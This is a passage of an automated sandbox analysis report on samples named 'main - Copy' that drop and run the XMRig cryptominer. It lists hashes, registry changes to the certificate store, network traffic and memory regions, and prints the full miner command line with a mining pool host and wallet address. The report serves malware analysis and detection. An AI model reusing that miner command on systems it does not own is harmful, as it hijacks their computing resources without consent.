| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef
4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4044 wrote to memory of 3672 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4044 wrote to memory of 3672 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.178.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3672-16-0x000001D2E48E0000-0x000001D2E4900000-memory.dmp
memory/3672-17-0x000001D376CB0000-0x000001D376CD0000-memory.dmp
memory/3672-18-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-20-0x000001D377320000-0x000001D377340000-memory.dmp
memory/3672-19-0x000001D3770F0000-0x000001D377110000-memory.dmp
memory/3672-21-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-22-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-25-0x000001D377320000-0x000001D377340000-memory.dmp
memory/3672-24-0x000001D3770F0000-0x000001D377110000-memory.dmp
memory/3672-23-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-26-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-27-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-28-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-29-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-30-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-31-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-32-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-33-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-34-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-35-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-36-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-37-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-38-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-39-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-40-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-41-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-42-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-43-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-44-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-45-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-46-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-47-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-48-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-49-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-50-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-51-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-52-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-53-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-54-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-55-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-56-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-57-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-58-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-59-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-60-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-61-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-62-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-63-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-64-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-65-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-66-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-67-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-68-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-69-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-70-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-71-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-72-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-73-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-74-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-75-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-76-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-77-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-78-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-79-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-80-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-81-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-82-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-83-0x00007FF791D30000-0x00007FF792833000-memory.dmp
memory/3672-84-0x00007FF791D30000-0x00007FF792833000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:27
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 408 wrote to memory of 3320 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 408 wrote to memory of 3320 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.116.69.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3320-16-0x0000024A018A0000-0x0000024A018C0000-memory.dmp
memory/3320-17-0x0000024A018F0000-0x0000024A01910000-memory.dmp
memory/3320-18-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-19-0x0000024A01910000-0x0000024A01930000-memory.dmp
memory/3320-20-0x0000024A01930000-0x0000024A01950000-memory.dmp
memory/3320-21-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-22-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-23-0x0000024A01910000-0x0000024A01930000-memory.dmp
memory/3320-25-0x0000024A01930000-0x0000024A01950000-memory.dmp
memory/3320-24-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-26-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-27-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-28-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-29-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-30-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-31-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-32-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-33-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-34-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-35-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-36-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-37-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-38-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-39-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-40-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-41-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-42-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-43-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-44-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-45-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-46-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-47-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-48-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-49-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-50-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-51-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-52-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-53-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-54-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-55-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-56-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-57-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-58-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-59-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-60-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-61-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-62-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-63-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-64-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-65-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-66-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-67-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-68-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-69-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-70-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-71-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-72-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-73-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-74-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-75-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-76-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-77-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-78-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-79-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-80-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-81-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-82-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-83-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
memory/3320-84-0x00007FF667AA0000-0x00007FF6685A3000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:27
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2264 wrote to memory of 1868 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2264 wrote to memory of 1868 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1868-16-0x000001DD34AC0000-0x000001DD34AE0000-memory.dmp
memory/1868-17-0x000001DD34B00000-0x000001DD34B20000-memory.dmp
memory/1868-18-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-19-0x000001DD34B20000-0x000001DD34B40000-memory.dmp
memory/1868-20-0x000001DD34B40000-0x000001DD34B60000-memory.dmp
memory/1868-21-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-22-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-25-0x000001DD34B40000-0x000001DD34B60000-memory.dmp
memory/1868-24-0x000001DD34B20000-0x000001DD34B40000-memory.dmp
memory/1868-23-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-26-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-27-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-28-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-29-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-30-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-31-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-32-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-33-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-34-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-35-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-36-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-37-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-38-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-39-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-40-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-41-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-42-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-43-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-44-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-45-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-46-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-47-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-48-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-49-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-50-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
memory/1868-51-0x00007FF6BCE10000-0x00007FF6BD913000-memory.dmp
